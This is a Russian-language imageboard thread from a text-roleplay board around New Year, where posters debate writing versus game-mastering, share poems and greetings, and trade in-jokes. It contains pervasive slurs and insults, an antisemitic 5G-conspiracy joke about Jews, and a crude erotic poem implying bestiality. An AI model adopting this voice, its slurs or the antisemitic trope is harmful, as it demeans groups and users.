Аноны играют в едином моменте, не раздумывая кому там что интересно или нет. Это как играть в покер и на серьезных щщах описывать каждое действие, да еще и у каждого игрока интересоваться почему он делает так, а не иначе.
Насчет умности - скорее комплимент, но ты воспринимаешь все серьезно, тут такое не любят
Вот эти ребята >>07592 >>07586 должны тебя убедить в этом
Ну не всегда, признай. Многие из авторов и соавторов, вошедших в анналы истории писали не в коммерческих целях ни разу.
Ну, я согласен что аноны играют в моменте, но это всë таки творчество, как бы его не воспринимали. А чтоб было интересно — это не цель игры, конечно. Я это описывал как приятное следствие.
Ладно, спасибо в любом случае за беседу небольшую, может я действительно всё воспринимаю слишком серьёзно. Я наверное и забыл, что это брг. Родные, тёплые места. Просто поймал себя на мысли, что на письме легче рассуждать, и вот решил порассуждать почему горе писателям помогает писать, а ГМам мешает. Если утрировать.
Да и вообщн всё сейчас каким то странным кажется. Надеюсь, всё странное, плохое и непонятное останется в этом году, а в новом всё будет иначе. И да, с наступающим тебя, анон.
Ты меня растрогал! И тебя с наступающим! Как бы там чего ни было в следующем, все вот это вот, как ты и сказал, пусть останется в этом.
Однако...
Слышу голос, голос спрашивает строго -
А сегодня что для завтра сделал я?
>Родные, тёплые места
помойки, да
Я считаю, ваша ошибка в том, чтобы приравнивать игру и книгу. Игры не надо читать как художественное произведение, хотя некоторые бывает и интересно пролистать. В них надо играть, погружаться в процесс, который и является ценным, а не законченность, как в произведении. Это походит всё чем-то на иммерсивный театр.
Но даже без этого, такие игры не равны книге, очень похоже, да, но всё таки это разное.
Писать нормально - это вообще ебаная мука. Напишешь залпом (если повезет) авторский лист, а потом будешь его 100 раз перечитывать и 20 раз переписывать, чтобы вышло что-то внятное с точки зрения стиля и повествования. И все равно останешься недоволен. Любое хорошее творчество - это и так на 80% страдание, а не отдушина. ГМство все же не обязывает быть идеальным и выверенным, да и не получится это.
Не думаю, что кто-то здесь пытается что-то создать или рассказать, как это принято в литературе. Скорее просто повеселиться. Если кому-то становится невесело, то он это дело прекращает. А невесело стать может по многим причинам, некоторые из которых ты уже описал.
Хуезавр, мы тебя поняли, ты не обязан делать нам кхилинир reload, не нагружай себя, расслабьсь
Спасибо, анон. Со временем новый год лично для меня стал не столько праздником, сколько символической переходной точкой между хуевым прошлым и прекрасным будущим. А раньше как будто бы были день за днём хорошие дни и новый год был просто... Праздником.
>Слышу голос, голос спрашивает строго -
>А сегодня что для завтра сделал я?
Ты живёшь, анончик. Ты мыслишь, а если при этом и думаешь, то точно живёшь. А коль занимаешься чем-то, что приносит тебе удовольствие и как то тебя развивает, тогда уж точно ты жив. А это главное. Ведь когда мир меняется, вместе с ним меняется всё, что в нём живёт. Всякие лютые хикканы например ничего не делают, поэтому вся их жизнь однообразна и построена на жратве и игрушках. И длится эта жизнь в одном темпе. Она не меняется. И они не меняются. А ведь живое должно меняться.
Поэтому главное ощутить себя живым — выйти на пробежку, что-нибудь почитать, о чем-нибудь подумать, с кем-нибудь поговорить, и т.д и т.п.
А дальше ты поймёшь, что дорогу прокладывает идущий.
Обнял со всей силы. Чмокнул в щечку (по-братски).
А что думаешь насчет дня рождения? Тоже символический?
Ты не понял меня. Если ты находишься в состоянии некоего отчаяния, испытываешь какое-то страдание, то у тебя само по себе будет писаться нормально. Ну или если ты вдохновение словишь, но такое наверное труднее. Не утверждаю, но обычно так. Если ты пишешь так, что потом переписываешь по 20 раз, то ты себя заставляешь писать, а пишет несчастный наборщик букв внутри тебя. Конечно это не отдушина.
>Не думаю, что кто-то здесь пытается что-то создать или рассказать, как это принято в литературе
Я в своё время пытался, но вовремя понял что тут подход другой нужен. Конечно, главное это повеселиться. Просто с творческим элементом. Это знаешь, как например детские разукрашки. Плохая аналогия, но всё же.
>>07607
Да не Хуезавр я. Он — отдельный кадр. Интересный, на самом деле. И я с удовольствием сыграю в его Кхилинир, если он его перезапустит как хотел. Или че он там хотел.
А, так это ты. Ладно. Ну, знаешь насчёт дня рождения. День рождения это скорее день для того, чтобы осознать и осмыслить прожитое. Иногда это настолько неприятно делать, что многие проводят днюху или в одиночестве в обнимку с бутылкой, или со шлюхами и косячками, или не отмечают вообще. Но я бы не хотел бежать от действительности, поэтому стараюсь отмечать. И заодно анализировать.
Про законченность не было и речи, и я, прошу заметить, не приравнивал книги и игры. Во всяком случае не хотел этого делать. Я хотел только указать на их сходство. И я согласен, что в играх важнее погружение, нежели всё остальное. В книгах часто тоже. Другое дело, что погружение зависит от многих факторов. Сюжет, персонажи и т.д
В зависимости от ситуации. Некоторые отрезки времени между днюхами были радостными, тогда сидишь с улыбкой вспоминаешь. Некоторые тоскливые. Тогда да, грустный день.
И если новый год это можно сказать что про итоги в целом, то днюха это именно про твои итоги. Хотя я много чего вывел из конкретно мною прожитого и под новый год.
И я не до конца раскрыл. Днюха это наверное всё таки в первую очередь и повод порадоваться вне зависимости от того, какими будут результаты осмысливания и анализа. Дескать да, я стал делать то, появилось в моей жизни это, ушло это, было хуево, но я это пережил и могу в честь этого хорошо покушать и попить. Ну или кто что делает.
Все я понял. Я в целом про творчество писал.
>Если ты пишешь так, что потом переписываешь по 20 раз, то ты себя заставляешь писать, а пишет несчастный наборщик букв внутри тебя. Конечно это не отдушина.
Услышал тебя, дорогой. Но я не про отыгрыш в брг говорил.
Никто не пишет сходу. Никто. Ну может единицы какие-то. Под любым произведением десятки, а то и сотки черновиков. Либо это гений один на миллион на , либо редкий один на миллион кал.
640x480, 0:13
Да успокойся ты, серун
Не лучшая, конечно, идея, показывать стихи в бргаче, но если в издаче мне сказали пару приятных слов о них, то здесь, думаю, как минимум не сильно обоссут.
Последнее что писал:
Стоят шатры, стоят палатки,
Влачится старец по песку,
И ткань потертой арафатки
Скрывает жажду и тоску.
Кочевник древний, сын пустыни,
На вид в отцы годится ей.
Идёт вдоль порослей полыни,
Утешить жён и матерей.
У берегов ручья крутого,
Обросших сорною травой,
Как тень пророчества дурного,
Гремел в ночи кровавый бой.
Два племени, в бою жестоком,
В безумье жажды и вражды,
В могилу сведены злым роком,
В сраженьи за глоток воды.
Мечей коснулся солнца блик,
Давно затих последний вздох,
Настало утро, а старик,
Увидел, что ручей засох.
А ведь я вдохновился на написание этого стиха, когда перечитывал Кхилинир. Так что тут этому стишку самое место.
Не лучшая, конечно, идея, показывать стихи в бргаче, но если в издаче мне сказали пару приятных слов о них, то здесь, думаю, как минимум не сильно обоссут.
Последнее что писал:
Стоят шатры, стоят палатки,
Влачится старец по песку,
И ткань потертой арафатки
Скрывает жажду и тоску.
Кочевник древний, сын пустыни,
На вид в отцы годится ей.
Идёт вдоль порослей полыни,
Утешить жён и матерей.
У берегов ручья крутого,
Обросших сорною травой,
Как тень пророчества дурного,
Гремел в ночи кровавый бой.
Два племени, в бою жестоком,
В безумье жажды и вражды,
В могилу сведены злым роком,
В сраженьи за глоток воды.
Мечей коснулся солнца блик,
Давно затих последний вздох,
Настало утро, а старик,
Увидел, что ручей засох.
А ведь я вдохновился на написание этого стиха, когда перечитывал Кхилинир. Так что тут этому стишку самое место.
Наверное гораздо круче слизывать и ролекуколдить
А вот ненадо вот этого вот "хоть кем-то", понимаешь? Оценено должно быть не в брг, а среди тех, кто в этом чего-то смыслит, мне же просто понравилась выдержанная мелодичность, а я что, я ж не экспэрт какой. А ты прекращай свои произведения лишь бы кому показывать, вон уже серят как
А знаешь почему тебе это кажется кринжем? Потому что это искренность. В том числе стихи, это высшая форма искренности. Для тебя кринжем является именно она, ты не приемлешь её ни в каком виде, тем более в таком архаичном, как стихотворение. Дитя пороков нашего мира, мира информации и цифрового безумия...
Какой же ты душный пидорас, невозможно осилить даже 1 строчки твоей писанины, настолько от неё веет духотой, фу блять, мне аж плохо стало.
Не помню про пресное озеро, но про полковника Хуезавренко точно было что-то. Поищи в [ДАННЫЕ ЗАСЕКРЕЧЕНЫ]
>>07642
Мне просто понравилось то, что именно в брг кто-то оценил. Понятное дело, что там где надо, там всегда оценят. Это знаешь, как если бы священник прочитал проповедь языческому племени и она нашла бы у них отклик. Вот что-то такое я сейчас чувствую.
Да, это так. Молодец, что выплеснул эмоции. Но всё же лучше попить магний и меньше грубить незнакомым людям.
Понимаю, отклик важен. И не вздумай подумать, что я тебе льщу! Ни в коем случае.
Хотя я вот фанфик пишу когда мне и так понятно, что анонам он понравился, что его оценили. Да, бывает что прямо пишут о том, что плохо, но очевидно что это пока еще не раскрытые для разных разностей невинные души. Но это пока. А я, можно сказать, наслаждаюсь тем, что фанфик написал и его прочитали, и мне радостно и анонам и все это без слов
Ящитаю, от изначальной дефиниции ролевых игр далеко при подобных рассуждениях отходить далеко тоже особо не стоит. Да и несмотря на некоторую схожесть в литературном базисе, ногами два явления — непосредственно писательство в любой жанровой плоскости и текстовая ролевая игра — уходят в совершенно разные области. Я в какой-то мере слаб и уныл, если заводить речь про осведомлённость касательно полимеров классической литературы и всей её подноготной, поэтому про непосредственно первоначальный тезис про корреляцию жизненного положения с качеством рожаемого текста ничего, наверное, и не скажу дельного.
В общем, если таки перетекать к игре с оперделениями, выскажу следующее. Авторство в первозданном его значении имеет несколько отличный от текстовок посыл. По самому форм-фактору — высокоорганизованный коммуникационный рупор, хай-тир способ распространения информации. Философия? Буквально пост на имиджборде, точно так же стремящийся донести до аудитории определённые мысли автора, что он закладывал в свой опущ магнум. Проза? Проза по тому же самому принципу работает, значение имеет лишь вопрос её содержания меж строк. Аллюзии на события реальной жизни, сатира на разные социально-политические (вспоминая те же кувыркания Булгакова с Кремлём) аспекты etc. Да в принципе особо смысла не имеет каждый жанр разбирать, это так, подкрепляющие мою мысль распространения — текст почти всегда является отражением мыслей своего создателя, вопрос лишь в угле отражения. Тот же Толкин же, как многим известно, также в кольца вкладывал критику индустриальщины и прочей техноереси.
Теперь к ролплею. При сравнении с привычной и долгоживущей формой писательства хотел бы отметить важность для учёта тех декораций, в которых релейт нашего треда и развился. Тырнетики, борда. Картина жизни в целом лютейшим образом переебнулась с ног на голову. На высирание энного количества графомании не требуется кабанистое знакомство с издателями, факт наличествования в тусовке других авторов по той же тематике. Захотел — оплачиваешь интернетик, дрочишь на поней, изобличаешь глобалистов в зоге... писательствуешь в вээр/брг. Спектр доступного досуга огромнейший. Спектр доступных социальных контактов тоже. То, что годами копилось в умах малоизвестных на момент жизни авторов, изредка лишь приоткрывая себя знакомым, теперь не копится в принципе. Формы самовыражения на публику вне зависимости от её размеров в числе значительно преумножились, да и ранжировка самой публики по параметрам её воспринимательской способности тоже. Тут в принципе можно лонгридом неебических масштабов разродиться на тему того, как виртуалочка повлияла на жизнь хуманов, но как-то в падлу настолько большой объём КПД затрачивать, попробую сильно мыслью не растекаться и придерживаться изначальной темы.
В общем, некая монументальность литературного труда исчезла за его легкодоступностью. Да и попробуй нонче огроменный талмуд издать — публики тупо не будет, всё и вся погрязло в стремительно изменяющемся потоке инфоповодов, договорнячков и далее по списку. Аудитория сейчас социоблядством и пиздежом на камеру набирается, если говорить про широкие публичные направления, а не специализированные сообщества.
Теперь к "играм". Я сомневаюсь, что в любом из тредов, что водились за эти годы, первоначальной задачей ГМами ставилась проекция своих мировоззренческих квирков на играчков. Я сам при своих играх руководствовался стремлением преподнести аудитории хороший, интересный манямирок. Через декорации, сюжет. Скорее всего, подобное можно и к другим ГМам отнести. Вдохновение сторонними источниками, желание вручную повторить-посмаковать где-то виденный ранее троп. По форме своей РП — досуг, кружок по интересам. Способ с единомышленниками заняться общим хобби. То есть да, как будто в большей степени роляет здесь аспект совместного построения истории, поэтому я вот сам натянуть сходство с писаками-классиками здесь едва ли смогу, ибо в сути отличия кардинальные.
Но и вождение игр я бы не подвергал анафеме и от родства с творчеством не отрекал. Просто форма творчества другая. Авторы от литературы творили в одиночку, транслировали свой опыт, своё видение. Авторы от ролплея творят свои мирки, воплощая собственные фантазии и одновременно приглашая прочих к процессу присоединиться. Квинтэссенция в совместности. Ту же окрещённую в народе рарной таверну вспомни, где я просто высрал генерик сеттинг, а ту ламповую окраску ему придали именно игравшие в тред.
То есть как бы да, невзирая на наличествующие сходства во внешних качествах, схема функционирования у двух рассматриваемых сабжей таки разная. Просто во внимание ещё стоило бы брать бордоспецифику с её культурными и коммуникационными бзиками, которые тоже весьма неслабо разграничивают тот же ФТ и нормиролёвки на форумах/телеге/вбыдлятне.
А водящий сказочного большой молодец, тут согласен, сил и вдохновения ему.
Всё вышевыблеванное является строгим имхуем и на истинность в последней инстанции не претендует. Уот такие уот мысли.
Ящитаю, от изначальной дефиниции ролевых игр далеко при подобных рассуждениях отходить далеко тоже особо не стоит. Да и несмотря на некоторую схожесть в литературном базисе, ногами два явления — непосредственно писательство в любой жанровой плоскости и текстовая ролевая игра — уходят в совершенно разные области. Я в какой-то мере слаб и уныл, если заводить речь про осведомлённость касательно полимеров классической литературы и всей её подноготной, поэтому про непосредственно первоначальный тезис про корреляцию жизненного положения с качеством рожаемого текста ничего, наверное, и не скажу дельного.
В общем, если таки перетекать к игре с оперделениями, выскажу следующее. Авторство в первозданном его значении имеет несколько отличный от текстовок посыл. По самому форм-фактору — высокоорганизованный коммуникационный рупор, хай-тир способ распространения информации. Философия? Буквально пост на имиджборде, точно так же стремящийся донести до аудитории определённые мысли автора, что он закладывал в свой опущ магнум. Проза? Проза по тому же самому принципу работает, значение имеет лишь вопрос её содержания меж строк. Аллюзии на события реальной жизни, сатира на разные социально-политические (вспоминая те же кувыркания Булгакова с Кремлём) аспекты etc. Да в принципе особо смысла не имеет каждый жанр разбирать, это так, подкрепляющие мою мысль распространения — текст почти всегда является отражением мыслей своего создателя, вопрос лишь в угле отражения. Тот же Толкин же, как многим известно, также в кольца вкладывал критику индустриальщины и прочей техноереси.
Теперь к ролплею. При сравнении с привычной и долгоживущей формой писательства хотел бы отметить важность для учёта тех декораций, в которых релейт нашего треда и развился. Тырнетики, борда. Картина жизни в целом лютейшим образом переебнулась с ног на голову. На высирание энного количества графомании не требуется кабанистое знакомство с издателями, факт наличествования в тусовке других авторов по той же тематике. Захотел — оплачиваешь интернетик, дрочишь на поней, изобличаешь глобалистов в зоге... писательствуешь в вээр/брг. Спектр доступного досуга огромнейший. Спектр доступных социальных контактов тоже. То, что годами копилось в умах малоизвестных на момент жизни авторов, изредка лишь приоткрывая себя знакомым, теперь не копится в принципе. Формы самовыражения на публику вне зависимости от её размеров в числе значительно преумножились, да и ранжировка самой публики по параметрам её воспринимательской способности тоже. Тут в принципе можно лонгридом неебических масштабов разродиться на тему того, как виртуалочка повлияла на жизнь хуманов, но как-то в падлу настолько большой объём КПД затрачивать, попробую сильно мыслью не растекаться и придерживаться изначальной темы.
В общем, некая монументальность литературного труда исчезла за его легкодоступностью. Да и попробуй нонче огроменный талмуд издать — публики тупо не будет, всё и вся погрязло в стремительно изменяющемся потоке инфоповодов, договорнячков и далее по списку. Аудитория сейчас социоблядством и пиздежом на камеру набирается, если говорить про широкие публичные направления, а не специализированные сообщества.
Теперь к "играм". Я сомневаюсь, что в любом из тредов, что водились за эти годы, первоначальной задачей ГМами ставилась проекция своих мировоззренческих квирков на играчков. Я сам при своих играх руководствовался стремлением преподнести аудитории хороший, интересный манямирок. Через декорации, сюжет. Скорее всего, подобное можно и к другим ГМам отнести. Вдохновение сторонними источниками, желание вручную повторить-посмаковать где-то виденный ранее троп. По форме своей РП — досуг, кружок по интересам. Способ с единомышленниками заняться общим хобби. То есть да, как будто в большей степени роляет здесь аспект совместного построения истории, поэтому я вот сам натянуть сходство с писаками-классиками здесь едва ли смогу, ибо в сути отличия кардинальные.
Но и вождение игр я бы не подвергал анафеме и от родства с творчеством не отрекал. Просто форма творчества другая. Авторы от литературы творили в одиночку, транслировали свой опыт, своё видение. Авторы от ролплея творят свои мирки, воплощая собственные фантазии и одновременно приглашая прочих к процессу присоединиться. Квинтэссенция в совместности. Ту же окрещённую в народе рарной таверну вспомни, где я просто высрал генерик сеттинг, а ту ламповую окраску ему придали именно игравшие в тред.
То есть как бы да, невзирая на наличествующие сходства во внешних качествах, схема функционирования у двух рассматриваемых сабжей таки разная. Просто во внимание ещё стоило бы брать бордоспецифику с её культурными и коммуникационными бзиками, которые тоже весьма неслабо разграничивают тот же ФТ и нормиролёвки на форумах/телеге/вбыдлятне.
А водящий сказочного большой молодец, тут согласен, сил и вдохновения ему.
Всё вышевыблеванное является строгим имхуем и на истинность в последней инстанции не претендует. Уот такие уот мысли.
— Я не знаю, я думал здесь ролевые игры и разврат, а не философский кружок.
Где?
Ты никакой искренности не знаешь, серунидзе. Тут правильно сказали что демонстрировать здесь какое-то проявление искусства, это то же самое что проповедовать дикарям. Я бы и сам своё скинул, но уже явно никто не оценит
Да, да, как скажешь, светоч искусства. Наверное, у тебя там мощное творчество, раз ты так горячо силишься доказать на дваче свою состоятельность как творца, лол. Твоя пресловутая искренность очень ценна, безусловно, что бы мы без неё делали.
Горячо и страстно выражаешься только ты. А я просто тебе отвечаю.
Да, я согласен с тобой в целом. Если подытожить наши рассуждения, то получается, что творчество тут выступает в роли некоего инструмента, который используется для реализации т.н РЕСУРСА в текстовых ролевых игрулях. И пейсатели, которые как ты верно сказал вкладывают явно или тайно какой-то посыл в свои произведения, и ролевички, которые веселятся роллами по болотнику, просто используют творческий элемент как способ передачи мыслей букавами.
Я хотел было высрать такое же полотнище, но сегодня наверное клятые жиды облучили меня своими пять джи вышками во время посещения центра города. Зимой там ещё и хуево крайне.
В любом случае добра тебе.
В итоге я просто не играю и не вожу. Но иногда действительно в качестве отдушины пишу лор и правила для игр, которые никогда не будут проведены.
Ничего страшного. Хоть дверца в вольер была открыта, но мы по большей части слышали, а не видели, как они тебя там ебали.
Но-но! Руки прочь, это сам мейстер Ху-ез-авер! Никогда не слышать о нем, да еще спутать с обыкновенными графоманами - непростительно, милейший, непростительно! Вам следовало бы поднабраться знаний о пирамидке, прежде чем выходить в свет.
А тот кому он отвечал кто?
Потому что именно КрАЗ — ЛЮДОЕД ЧЕРНОБЫЛЯ.
А что там делать, там нет подходящих игр всё равно.
Ну было и было. Не завидуй.
Мне положено знать в первую очередь. Ведь изображение на мониторе когда-то было моей аватаркой, ты знал?
Совершенно не понимаю что ты имеешь ввиду. Почему эта сова слева и этот звёздный мальчик справа лижут ноутбук с моей аватаркой? Сейчас же отвечай.
Обязательно передам
Ответь сразу на простой вопрос. Ты скуку собираешься разбавлять как? Реальной игрой? Или снова создашь барак для серунов, которые будут смеяться с того, как ты пишешь посты по две недели?
Планирую пробно выйти в бэ на новогодних. Сейчас у меня времени просто навалом, а провайдер после сотен жалоб предоставил мне элитный роутер, пакетик орешков и двух чернокожих секс-рабынь. Зависимостей никаких давно нет к тому же. Поэтому планируется плотная игра. Главное подготовиться по нормальному.
>сходка из одних мужиков
ясно, развлекайтесь сами
>ходить на сходки
мало того что вы конфобляди, так еще и нормисы, пиздец просто
Унитазные писсуары
И ни один самый жалкий граф не мог сравниться с настоящим бргшным унитазом
Какие 30 дней Вася, два месяца прошло. Я по счастливому стечению обстоятельств решил вроде как все свои проблемы и хотел начать новую жизнь с новыми друзьями, любовью и делом всей жизни, но не успел глазом моргнуть как оказался здесь. В любом случае, после окончания этой игры, если она состоится, я забуду в пизду про брыгальню и двач в целом. И вообще я хотел войти в новый год новым человеком, поэтому игра если будет, то до нового года. И вообще. У меня всё.
А ты неплох. Не думал стать местным клоуном?
Ангирчик, не спеши. До нового года ты ничего путного подготовить уже не успеешь, да и активные игрочки сейчас заняты в сказочном. Твоими главными проблемами всегда были непостоянство и недостаточная подготовка. Как минимум одну из них ты можешь решить, если не будешь так торопиться. Тейк йор тайм, как говорится.
Иди лучше в Сказочный вкатись, развейся.
Ещё один. Не хочешь за парту к собрату по несчастью? За правильное чтение там дают леденцы "гусиная лапка".
Да, я начал, и вернулся на свою любимую доску, откуда ливнул с позором, а сейчас замучу игру вот прям точно до НГ. Будешь играть?
>назвать тебя пиздаболом и вниманиеблядью
Надо обоссать, и перестать мне отвечать чтобы я уполз спамить в свой любимый дискорд канал.
Замечательно, я запомню.
> хотел начать новую жизнь с новыми друзьями, любовью и делом всей жизни, но не успел глазом моргнуть как оказался здесь
И так вся жизнь пройдет перед глазами
Друг, влачишь ты жизнь, без пользы увядая
Остановись, спроси себя: "Чего добился я?"
Хуëролс. В реаллайф надо уходить, анон. И только в реаллайф. Я собственно там и нахожусь по большей части, просто двачи в последнее время сильно утягивают вниз и начинаю жёстко сычеть. С нового года я выхожу в жизнь по настоящему. Сейчас вспоминаю сколько упущенных возможностей покутить и потусить было и страшно становится. Надо жить. Социоблядствовать.
Конечно, если предложить двачеру выйти в ирл, ему станет настолько неприятно, что он мгновенно примет это предложение за троллинг. На воролсе вашем как я погляжу такие же двачеры обитают.
Так на тусовочках с нормисами опять за алкашку возьмёшься, для смелости, и чтобы быть на одной волне, а потом с запоя снова к нам, жаловаться, плакаться в жилетку братьям анонам.
Взялся я за неё как раз тогда, когда стал сидеть дома и никуда не вылезать. Так что нет, тут обратный эффект.
Попытка битарда в текстовую ролевку. Пока выглядит спорно
Я вот социофоб, потому даже при всём желании не смогу вылезти из болота.
Вот и подходит к концу 2025 год. Год был интересным и многообразным на различные игры, на разнообразные события и всякие интересности. Тавернатреды и хентай-школа, вайфу-треды, завышенный и дикий, (пост)разгульный, застава, сказочный, ерп-треды, поезда, да всего и не перечислить...
Рад, что сама идея ролевых игр живет, несмотря на обилие видеоигр, чатботов и т.д. Все-таки, нет ничего лучше обмена идеями и мыслями с другими, настоящими людьми, общением с ними, пусть даже это и будет выражено через наши любимые срачи - это все равно общение, взаимодействие друг с другом. И пусть мы все сейчас находимся далеко друг от друга, скрываемся под масками анонимности или аватарками, у каждого из нас своя жизнь и свои ценности, все же неизменна наша общая любовь к ролевым текстовым играм, в которые всегда можно окунуться с головой и совместно наслаждаться ими. Благодаря ГМам, игрокам, наблюдателям игры постоянно развиваются, вносится что-то новое, осмеливаются экспериментировать, что-то вычеркивать и добавлять и как же прекрасно, что все это происходит именно благодаря той самой искре в наших сердцах, которая способна разжечь огонек в других, "заразить" идеей ролевых игр, привить любовь к ним.
Я хочу пожелать всем нам, чтобы этот огонек всегда горел в нас, готовый разжечь пожар в любой момент, как только мы этого захотим. Желаю, чтобы в следующем году нас ждало еще больше интересностей, запоминающихся игр, смелых идей. А это все не может быть без хороших ГМов, которые будут любить игроков и сами будут любимы, не может быть без милых и занимательных персонажей, которые будут запоминающимися и ожидаемы в любых играх, не может быть без самих игроков, которые вдохновленно и интересно будут проводить время вместе друг с другом и уважать дело ГМа, поэтому я верю, что все мы будем именно такими и будем становиться все лучше и лучше, развивать себя и не только слушать, но и слышать друг друга. Ну и, разумеется, какие могут быть игры без внутреннего вдохновения, которое рождается только на том самом фундаменте, который нужно обеспечить прежде, чем появится желание играть, а потому я желаю вам крепкого здоровья, счастья, мирного неба над головой, будьте любимы и любите сами.
С новым годом!
https://www.youtube.com/watch?v=UQEv4Sx9csc&list=RDUQEv4Sx9csc&start_radio=1
Поздравляю раньше потому, что с завтрашнего дня буду потихоньку накатывать и начинать усиленную подготовку к 31, так что вероятно не до игр с двачами будет, а потому может даже и к лучшему что в зимнем логично закончил
Вот и подходит к концу 2025 год. Год был интересным и многообразным на различные игры, на разнообразные события и всякие интересности. Тавернатреды и хентай-школа, вайфу-треды, завышенный и дикий, (пост)разгульный, застава, сказочный, ерп-треды, поезда, да всего и не перечислить...
Рад, что сама идея ролевых игр живет, несмотря на обилие видеоигр, чатботов и т.д. Все-таки, нет ничего лучше обмена идеями и мыслями с другими, настоящими людьми, общением с ними, пусть даже это и будет выражено через наши любимые срачи - это все равно общение, взаимодействие друг с другом. И пусть мы все сейчас находимся далеко друг от друга, скрываемся под масками анонимности или аватарками, у каждого из нас своя жизнь и свои ценности, все же неизменна наша общая любовь к ролевым текстовым играм, в которые всегда можно окунуться с головой и совместно наслаждаться ими. Благодаря ГМам, игрокам, наблюдателям игры постоянно развиваются, вносится что-то новое, осмеливаются экспериментировать, что-то вычеркивать и добавлять и как же прекрасно, что все это происходит именно благодаря той самой искре в наших сердцах, которая способна разжечь огонек в других, "заразить" идеей ролевых игр, привить любовь к ним.
Я хочу пожелать всем нам, чтобы этот огонек всегда горел в нас, готовый разжечь пожар в любой момент, как только мы этого захотим. Желаю, чтобы в следующем году нас ждало еще больше интересностей, запоминающихся игр, смелых идей. А это все не может быть без хороших ГМов, которые будут любить игроков и сами будут любимы, не может быть без милых и занимательных персонажей, которые будут запоминающимися и ожидаемы в любых играх, не может быть без самих игроков, которые вдохновленно и интересно будут проводить время вместе друг с другом и уважать дело ГМа, поэтому я верю, что все мы будем именно такими и будем становиться все лучше и лучше, развивать себя и не только слушать, но и слышать друг друга. Ну и, разумеется, какие могут быть игры без внутреннего вдохновения, которое рождается только на том самом фундаменте, который нужно обеспечить прежде, чем появится желание играть, а потому я желаю вам крепкого здоровья, счастья, мирного неба над головой, будьте любимы и любите сами.
С новым годом!
https://www.youtube.com/watch?v=UQEv4Sx9csc&list=RDUQEv4Sx9csc&start_radio=1
Поздравляю раньше потому, что с завтрашнего дня буду потихоньку накатывать и начинать усиленную подготовку к 31, так что вероятно не до игр с двачами будет, а потому может даже и к лучшему что в зимнем логично закончил
Поздравь отдельным тредом, мало ли закрепят как старые поздравления.
С нг. Пускай на этих праздниках твое оборудование будет всегда настроено
>Тавернатреды и хентай-школа, вайфу-треды, завышенный и дикий, (пост)разгульный, застава, сказочный, ерп-треды, поезда, да всего и не перечислить...
Мдааа...
Год был НЕПРОСТЫМ.
>скатили в ерп, после чего тред был потерт
Небось опять педофайлы протиснулись к нормальным людям?
Евпатий в привычном облике ушел сосать собакам?
Однозначно без бонбиунитаза. С остальными все не так просто, так что их можно и оставить
В своем существовании
Без меня
Бордель — мастерская Санты
Унитаз — горшок эльфа
Хуезавр — волшебный олень
Ангир — помощник Санты
Эльфийка — Снегурочка
Серуны — мелкие бесы
Кумеры — непослушные дети
Игровой пост — подарок
Проиграл
Ролекуколды — снеговички; оленята Санты; пряничные человечки; хуй знает что еще.
Мотылёк и бард.
Ирэн Хуезавровна и ее конфоподружка.
Дофига такого было в хентай школе, можешь изучать архивы и приобщаться к прекрасному.
Она освободила своё тело от одежды.
И наготы зеленой не стыдясь,
Легла на камень, стала гладить коня нежно,
Смотреть на стержень, красоте его дивясь.
В груди её резвилось сердце молодое,
Душой и телом она зверю отдалась.
И думала, зажав его меж доек,
«Какой же я развратной родилась!»
В чём отличие Хуезавра от Лёхи?
Он традиционен, он школяр, он академичен, он строг. Но главное отличие: Лёха работает по букве, по сочинению, как придумал, так и должно быть. Сценарий, фраза, место действия – всё у него расписано. Хуезавр же позволял импровизировать. Лёха инициативных игроков не любил. С ним был спор сильный. Он говорил, что надо водить или не самобытных, или самобытного, но только один тред, потом отменять. Ему на это говорили:«Тогда давай на свалку и Сенокосца, и Даркнарика, и Сталкера. У всех великих ведущих /brg/ были свои игроки, которые понимали друг друга». И может поэтому он и продолжал игры водить, а потом бросил.
852x724, 0:15
Для разнообразия и отдушины, да и треды на нулевой всё равно много не простоят, была бы другая игра
Пудж
Серун
Вот проверенное. Пока сработал только рождественский голем, но можешь тоже попробовать поискать
Что же я хочу вам сказать? Простите. Игры не будет. Но надеюсь вы это понимали и раньше.
Хуезавр нееееееееет, на кого ты нас оставляешь?!?!
Ангир, не прыгай, подумай! Ты же хотел свою жизнь после нг менять, нормисом становиться, ирл уходить. Столько планов было!
Ты сильнее синьки, нужно только потерпеть какое-то время, чтобы желание нажраться начало отступать. Уйти, конечно, не уйдет, но ослабнет, а там и жить чуть легче станет, силы появятся чем-то заняться. А выпить все еще можно будет иногда, главное в запои не уходить, и все будет нормально
Ахтунг.
Пиздец вниманиеблядь уже не знает что бы такого высрать из себя, уже начал ркном угрожать
Вы вообще представляете какие тут сидят идиоты? Какие вы идиоты? Какой я идиот? Представляете вообще?
Тебе запятые некуда девать?
https://www.youtube.com/watch?v=lT57yUqdKSk&list=RDlT57yUqdKSk&start_radio=1
🎄🎄🎄🎄🎄🎄🎄🎄🎄🎄🎄🎄🎄🎄🎄
Почему тебе так хочется почитать мои посты, что за рабская тяга ко мне? Ты считаешь меня своим господином? Я польщён.
Прикалитесь Урал заимел в этом году. Никому не советую.
С новым годом, каким бы пустым ни был этот праздник. Главное, чтобы следующий год был для нас лучше чем этот! Добра вам.
И советую всем не пить в этот день.
желаю никакого ерп говна в 2026
всем добра и пейте в меру
Голодные
Ролекуколдизм, сэр.
Зачем самому отыгрывать, если можно посмотреть, как это делает кто-то другой?
А тут еще и буквально чел хочет посмотреть как его гоблиншу трахают буковками другие аноны.
Мы бы закончили твоей малышке на лицо, но ты не захотел вкатиться.
Почему вот ВЫ таких прикольных персонажей придумать не можете?
Вот когда по этому снимут сериал тогда пизди.
С тех самых. Как же местный ресентимет рвётся. Давайте вспомним лучшую рпг игру десятилетия, она кстати тоже по днде
>соевый
Слово, по которому сразу можно определить долбоеба, кста
Но Кхилинир был не по днд.
Это упущение. Передайте господину Х, чтобы в ремейке был пахфайндер
спокойствие поймай ебанат
Я годный.
1d10: (2) = 2
Хуйня от какого-то нваха.
Крутая пирамидка, а теперь надо бы её перевернуть и забабахать симметричную.
Какой-то пиар калфоблядей с намеком на юмор и ничего интересного
Проиграл. Как будто под этот текст снимали.
Это хорошо.
Орейро. Алсо в бойцовском клубе много сцен которые подошли бы для такой адаптации
1920x816, 0:27
Хуй знает че со звуком разговоров. Если скачать видео он появляется.
больно что тебя никто не форсит, чманоним?))))
